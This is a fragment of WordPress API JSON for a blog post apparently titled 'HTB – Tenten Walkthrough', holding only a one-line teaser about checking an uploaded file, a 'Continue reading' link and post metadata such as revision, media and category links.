I checked if the I uploaded exist, and yes it&#8217;s uploaded Also in HTML code of application page, I&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-tenten-walkthrough\/\">Continue reading <span class=\"screen-reader-text\">HTB &#8211; Tenten Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/58"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions"}],"predecessor-version":[{"id":59,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions\/59"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=58"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=58"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}